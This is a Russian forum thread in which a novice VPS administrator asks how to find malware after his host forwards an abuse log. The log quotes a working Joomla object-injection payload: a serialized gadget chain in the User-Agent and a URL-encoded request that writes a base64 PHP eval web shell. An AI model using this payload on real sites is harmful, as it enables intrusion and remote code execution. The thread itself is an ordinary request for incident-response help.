Как найти гада на VPS сервере?


#1

Держу на VPS один сайт на CS-Cart. Использую связку Ubuntu 18.04 + PHP-FPM + MySQL. Без контрольных панелей.

Хостер говорит что на мой ip адрес жалуются. Высылает вот такой лог исходящий активности:

Lines containing IP:188.225.9.122 in /furanet/sites/*/web/htdocs/logs/access
/furanet/sites/rafaelruizhermanos.es/web/htdocs/logs/access:188.225.9.121 - - [01/May/2019:18:03:40 +0200] “GET /administrator/?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B HTTP/1.0” 301 - “-” “-” “}__test|O:21:“JDatabaseDriverMysqli”:3:{s:2:“fc”;O:17:“JSimplepieFactory”:0:{}s:21:”\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:“SimplePie”:5:{s:8:“sanitize”;O:20:“JDatabaseDriverMysql”:0:{}s:8:“feed_url”;s:46:“eval($_REQUEST[1]);JFactory::getConfig();exit;”;s:19:“cache_name_function”;s:6:“assert”;s:5:“cache”;b:1;s:11:“cache_class”;O:20:“JDatabaseDriverMysql”:0:{}}i:1;s:4:“init”;}}s:13:"\0\0\0connection";b:1;}\xf0\x9d\x8c\x86"
Date: Wed May 1 18:03:42 CEST 2019

Посоветуйте как найти гада на сервере. Администрировать сервер начал совсем недавно. Знаний мало.

Пробовал записать лог исходящий активности с помощью tcpdump. Но чем фильтровать? У меня ведь есть только удаленный ip-адрес куда мой сервер стучится. И не факт что постучится именно к нему в след раз.


#2

Да найди админа на фрилансерских сайтах, баксов за 20 все тебе настроит.